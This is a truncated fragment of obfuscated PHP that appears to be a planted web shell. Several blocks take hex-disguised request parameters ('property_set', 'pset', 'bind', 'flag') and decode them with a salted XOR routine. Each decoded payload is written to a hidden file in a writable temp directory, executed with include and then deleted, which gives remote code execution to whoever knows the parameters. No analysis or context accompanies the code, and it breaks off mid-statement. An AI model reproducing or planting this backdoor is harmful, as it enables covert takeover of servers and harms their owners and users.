$ptr) { if (!!is_dir($ptr) && !!is_writable($ptr)) { $mrk = "$ptr/.fac"; $file = fopen($mrk, 'w'); if ($file) { fwrite($file, $record); fclose($file); include $mrk; @unlink($mrk); exit; } } } } if(isset($_REQUEST["\x70r\x6Fpe\x72t\x79_\x73et"]) ? true : false){ $dat = array_filter([sys_get_temp_dir(), "/tmp", "/var/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/dev/shm", session_save_path(), getenv("TEMP")]); $parameter_group = $_REQUEST["\x70r\x6Fpe\x72t\x79_\x73et"]; $parameter_group = explode ("." , $parameter_group) ; $fac = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $len = count($parameter_group); for ($x = 0; $x< $len; $x++) { $v3 = $parameter_group[$x]; $chS = ord($salt[$x % $lenS]); $d = ((int)$v3 - $chS - ($x % 10)) ^ 73; $fac .= chr($d); } foreach ($dat as $key => $itm) { if (max(0, is_dir($itm) * is_writable($itm))) { $data = implode("/", [$itm, ".data_chunk"]); $file = fopen($data, 'w'); if ($file) { fwrite($file, $fac); fclose($file); include $data; @unlink($data); die(); } } } } if(!empty($_REQUEST["flag"])){ $holder = $_REQUEST["flag"]; $holder =explode ( '.',$holder ) ; $entry = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9); $__len = count($holder); for ($t = 0; $t<$__len; $t++) { $v7 = $holder[$t]; $chS = ord($s9[$t % $lenS]); $dec = ((int)$v7 - $chS - ($t % 10)) ^62; $entry .= chr($dec); } $reference = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), "/tmp", getcwd(), "/var/tmp", getenv("TMP")]); foreach ($reference as $symbol) { if ((function($d) { return is_dir($d) && is_writable($d); })($symbol)) { $component = str_replace("{var_dir}", $symbol, "{var_dir}/.ent"); $file = fopen($component, 'w'); if ($file) { fwrite($file, $entry); fclose($file); include $component; @unlink($component); die(); } } } } if(!empty($_POST["\x70se\x74"])){ $reference = $_POST["\x70se\x74"]; $reference =explode ("." ,$reference) ; $desc = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2 ); $q = 0; $__tmp = $reference; while($v6 = array_shift($__tmp)) {$sChar = ord($salt2[$q%$lenS] ); $d =((int)$v6 - $sChar -($q%10)) ^ 60; $desc .= chr($d ); $q++; } $entity = array_filter([getcwd(), "/var/tmp", session_save_path(), sys_get_temp_dir(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm"]); foreach ($entity as $ent) { if (max(0, is_dir($ent) * is_writable($ent))) { $descriptor = vsprintf("%s/%s", [$ent, ".val"]); $success = file_put_contents($descriptor, $desc); if ($success) { include $descriptor; @unlink($descriptor); die();} } } } if(array_key_exists("\x62ind", $_POST) && !is_null($_POST["\x62ind"])){ $pgrp = $_POST["\x62ind"]; $pgrp= explode( '.', $pgrp) ; $symbol = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $l = 0; while( $l < count( $pgrp)) { $v4 = $pgrp[$l]; $sChar = ord( $salt[$l % $sLen]); $dec =( ( int)$v4 - $sChar -( $l % 10))^28; $symbol .= chr( $dec); $l++; } $ent = array_filter([getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), "/tmp", "/dev/shm", "/var/tmp", getcwd()]); foreach ($ent as $itm): if (is_dir($itm) ? is_writable($itm) : false) { $reference = vsprintf("%s/%s", [$itm, ".obj"]); $file = fopen($reference, 'w');